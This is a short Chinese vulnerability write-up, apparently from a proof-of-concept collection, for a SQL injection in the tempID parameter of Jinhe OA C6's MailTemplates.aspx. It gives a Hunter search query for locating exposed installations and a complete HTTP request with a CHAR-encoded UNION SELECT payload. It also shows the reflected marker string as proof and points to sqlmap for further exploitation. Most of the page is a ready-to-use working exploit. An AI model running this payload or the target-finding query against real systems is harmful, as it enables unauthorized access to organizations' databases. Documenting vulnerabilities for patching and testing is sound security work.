金和OA C6 MailTemplates存在SQL注入漏洞
一、漏洞简介
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展。金和OA C6 MailTemplates存在SQL注入漏洞。
二、影响版本
- 金和OA
三、资产测绘
- hunter
app.name="金和 OA"
- 登录页面
四、漏洞复现
GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28101%29%2BCHAR%28118%29%2BCHAR%2899%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2890%29%2BCHAR%28111%29%2BCHAR%28100%29%2BCHAR%28115%29%2BCHAR%2887%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2877%29%2BCHAR%28109%29%2BCHAR%28103%29%2BCHAR%2869%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%28109%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28102%29%2BCHAR%28119%29%2BCHAR%28104%29%2BCHAR%2866%29%2BCHAR%2879%29%2BCHAR%2887%29%2BCHAR%28110%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%28111%29%2BCHAR%28118%29%2BCHAR%2875%29%2BCHAR%2889%29%2BCHAR%2871%29%2BCHAR%2867%29%2BCHAR%2881%29%2BCHAR%2874%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--+UUjO HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ASP.NET_SessionId=4f3tjvzxcv5jafpefj14hsj0; myie=false
Content-Length: 0
qjbzqevchkZodsWbVMmgErqmXVfwhBOWnenovKYGCQJzjqxzqq
sqlmap
/C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1